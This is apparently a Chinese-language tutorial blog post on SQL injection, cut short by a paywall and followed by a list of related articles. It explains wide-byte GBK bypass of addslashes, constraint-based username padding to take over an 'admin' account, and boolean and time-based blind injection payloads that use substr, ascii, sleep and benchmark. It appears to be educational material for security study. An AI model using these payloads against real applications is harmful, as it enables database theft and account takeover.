SQL注入(二)

最新推荐文章于 2024-11-14 00:00:17 发布
原创 最新推荐文章于 2024-11-14 00:00:17 发布 · 697 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客介绍了SQL注入的两大类,包括字符型和数字型注入。详细阐述了宽字节注入、基于约束的SQL攻击及SQL盲注(布尔盲注、时间盲注、报错盲注)的原理和绕过方法,还介绍了报错盲注中多种报错类型及相关函数的使用。

SQL注入漏洞二

SQL注入两大类:

  1. 字符型注入
    例如:http://XXX.com/sql/id=ok ,这里页面显示’ok’时,即为字符型型注入
  2. 数字型注入:
    例如:http://XXX.com/sql/id=1 , 这里的id不需要闭合引号
    简单来说,在于有无引号的区别,字符型可以是字符和数字,但是数字型只能是数字

宽字节注入

宽字节注入是一个针对GBK的注入
以下是addslashes()函数,此函数为常见防SQL注入的函数
在这里插入图片描述
那么绕过的方法有两种:
1.例如我们需要 ’ 进行报错,那么我们前面再次加上\,得出\’,使其转义,'生效
2.‘的url编码为%5c%27,如果我们加上%df,得出%df%5c%27,变成運’,在这里需注意的是,我们用到的是gbk格式的url编码,这里因为MySQL使用gbk进行编码的,所以可以达到目的。

基于约束的SQL攻击

适用于以下场景:
对于用户名数据库进行了位数约束,比如限制只能为20位,管理员的用户名为admin,我们不知道密码,那么我们就可以通过写入

admin                                                   x,密码:123456

这时数据库会将其认为是admin,那么我们就可以通过123456进行登陆。数据库的代码为

insert into user values('','admin                                                  x','123456')

SQL盲注

布尔盲注:

1. left(database(),1) > ‘s’
left()指得到字符串从左算起指定个数的字符
示例:left(string, n)

left(database(),1) > 's' 表示数据库名第一位是否大于's'
left(database(),2) > 'ab' 表示数据库名前两位是否大于'ab'
2. substr((select database()),1,1) = ‘a’
substr()和substring()实现功能均为截取字符串
示例:substr(string, start, length)
     substring(string, start, length)
	 第一个参数为要处理的字符串,第二个为开始位置,第三个为截取长度

substr((select database()),1,1) = 'a' 表示查看数据库名第一位是否等于'a'
substr((select database()),2,1) = 'a' 表示查看数据库名第二位是否等于'a'
3. ascii(), ord(), mid()函数
ascii():将字符变为ascii码
ord():同ascii()

mid():截取字符串**一部分**
示例:mid(string, start, length)
	 eg:string = "123456"   mid(str, 2, 1)      结果为2

ascii(substr((select database()),1,1)) = 108
ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1)) >98 --+
4. regexp正则注入,like匹配注入
首先注意的是,此方法不能用做mssql。但是mysql同时支持like和regexp匹配,不过方法不同。

eg:select user() regexp '^ro'
    select user() like 'ro%'

具体可查看关于正则表达式详细讲解

时间盲注:

1. If(ascii(substr(database(),1,1))>115,0,sleep(5))
if():判断然后返回值

示例:IF(condition, value_if_true, value_if_false)
     Less-5/?id=1' and If(ascii(substr(database(),1,1))>115,0,sleep(10)) --+
2. select sleep(find_in_set(mid(user(), 1, 1), ‘a,w,t,r’)); ( user()为root@localhost )
find_in_set():查询str是否在strlist里

示例:FIND_IN_SET(str,strlist)

mysql> SELECT FIND_IN_SET('b', 'a,b,c,d');
-> 2                   因为b 在strlist集合中放在2的位置 从1开始

下图是可被查询到的结果,我们可以看到sleep了一段时间,经测试发现,睡眠时间每次不定,不利于用作真实渗透测试
可查询到
下图是未被查询到的结果,我们可以看到没有sleep
未查询到

3. UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M

SG’,’by 5 seconds’)),null) FROM (select database() as t1;

上面有说到benchmark()函数和encode()函数,下面我们仔细说下

endoce():使用key对text进行加密
示例:ENCODE('text','key');

BENCHMARK():可控制次数的执行函数
示例:benchmark(count,expr)            count为次数,expr为要执行的表达
式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执
行成功。这是一种边信道攻击,可在运行过程中占用大量的 cpu 资源。

SELECT
最低0.47元/天 解锁文章
SQL注入详解
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入——注入
m0_64365018的博客
08-05 1298
注入是一种较为隐蔽的 SQL 注入攻击方式。它并非直接在输入时进行攻击,而是先将恶意数据存储到数据库中,这些数据看似正常。随后,应用程序在后续的操作中,再次使用或处理这些之前存储的恶意数据时,未进行充分的过滤和验证,导致恶意数据被解释为可执行的 SQL 语句,从而引发安全漏洞。例如,用户注册时输入看似合法的用户名,之后在修改密码等操作中,系统未正确处理该用户名,使得攻击者能够篡改数据库中的数据。注入攻击具有很强的迷惑性,对数据库安全构成严重威胁,需要开发人员高度重视并采取有效的防护措施。
sql各种注入案例
m0_69435261的博客
09-01 5794
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集)GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。GTID_SUBSET函数。
sql注入实例
chinsourcer的专栏
05-16 662
前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就通过这个实例来告诉大家SQL注入究竟有多大的危害。   初步注入--绕过验证,直接登录   公司网站登陆框如下: 可以看到除了账号密码之外,还有一个公
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1421
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例:
sql注入示例
weixin_30340353的博客
11-01 167
实验指导说明 实验环境 • 实验环境 o 操作机:Windows XP o 目标机:Windows 2003 o 目标网址:www.test.ichunqiu • 实验工具: Tools Path SQLMap C:\Tools\注入工具\SQLMap 本节课程通过对SQL注入的演示,让大家了解SQL注入漏洞的方式,并学习应对此种漏洞的防御方法。 实验步骤 第一步 手工检测判断注入点 首...
第6章 6.WEB安全性测试--SQL注入.mp4
05-08
第6章 6.WEB安全性测试--SQL注入.mp4
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识: 1. PHP 语言基础:了解 PHP 语言的基础知识,熟悉 MySQL 的一些函数和语句。 2. MySQL 语句内容:熟悉 MySQL 的一些基本语句,如 SELECT、INSERT、UPDATE、DELETE 等。 3. MySQL 数据库结构...
sql注入简单例子(非常详细),零基础入门到精通,看这一篇就够了
最新发布
weixin_51725318的博客
11-14 5331
sql注入简单例子(非常详细),零基础入门到精通,看这一篇就够了
SQL注入基础样例1
qq_49283465的博客
05-02 657
其次我们尝试通过字符转义、传入大数id=50000000等各种方式来使其报错—此处表示你已经过了waf(即使你不会),我们观察他的闭合方式,诱导语句闭合并使用- -+把后面语句注释掉。小知识:我们要知道SQL语句的闭合方式:无符号闭合、单引号—‘’、双引号—“”、单引号与括号联动—‘)、双引号与括号联动—“)、单引号括号双引号—‘)“、以及搜索语句中—‘%’闭合。攻击方式:报错注入、union联合注入、布尔盲注、时间盲注、http头注入、宽字节注入(中国网站)、文件注入、DNS注入等。
SQL注入案例演示与防范措施大全
持之以恒
02-26 2万+
SQL注入攻击案例与应对措施。
Sql案例整理-注入
pp_lan的博客
09-08 634
Sql注入 示例 为了说明项目中的sql注入,此处以mybatis为例 package com.fiberhome.base; import com.fiberhome.base.dao.TUserMapper; import com.fiberhome.base.model.User; import org.junit.Assert; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.te
漏洞整理之SQL注入
Fengchen的博客
10-18 465
1 SQL注入 1.1 什么是SQLSQL是Structured Quevy Language(结构化查询语言)的缩写。SQL是专为数据库而建立的操作命令集,是一种功能齐全 的数据库语言。 1.2 什么是SQL注入SQL注入攻击包括从客户端向应用程序输入的SQL查询注入或“注入”恶意数据。 一个成功的SQL注入攻击可以做到以下内容: 读取或修改数据库中的敏感数据; 对数据库执行管理操...
【网络安全渗透测试零基础入门必知必会】之初识SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了(1
Libra1313的博客
06-21 1436
id=1 基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数的网页中,诸如查看用户个人信息,查看文章等,大都会使用这种形式的结构传递id等信息,交给后端,查询出数据库中对应的信息,返回给前台。SQL Cookie注入原理主要涉及到攻击者利用Web应用程序对Cookie处理不当的漏洞,通过修改或伪造Cookie中的值,将恶意的SQL代码注入到应用程序的数据库查询中,从而执行非授权的操作或获取未经授权的数据。主要源于应用程序对用户输入的字符型数据没有进行严格的过滤和验证。
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
08-01 3209
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
SQL注入
weixin_46396711的博客
04-11 278
若为SQL显注,则一般步骤为: 若可控制输入,则可通过简单的手工输入验证SQL注入漏洞规则; 可借助burpsuite捕获目标网站数据包,导出,通过sqlmap进行注入攻击。 常用sqlmap参数 -u “url” 指定要测试的网页URL,常用于get类型的url测试。 –cookie="cookie值“ 指定测试链接时所使用的cookie,常用于需登录后方能访问的页面。 -p 指定存在注入点的参数,可提高sqlmap的检测效率。 -r doc 将http请求保存至文档后,可以针对http请求进行检测
SQLMap工具-1SQLMap简介及简单应用实例
热门推荐
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
SQL注入攻防深度解析
"SQL注入天书是一份详尽介绍SQL注入技术的资料,涵盖了从基础到高级的ASP注入方法和技巧,适合不同水平的读者学习。" SQL注入是一种常见的网络安全漏洞,发生在Web应用程序未能充分验证和清理用户输入时。当用户...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值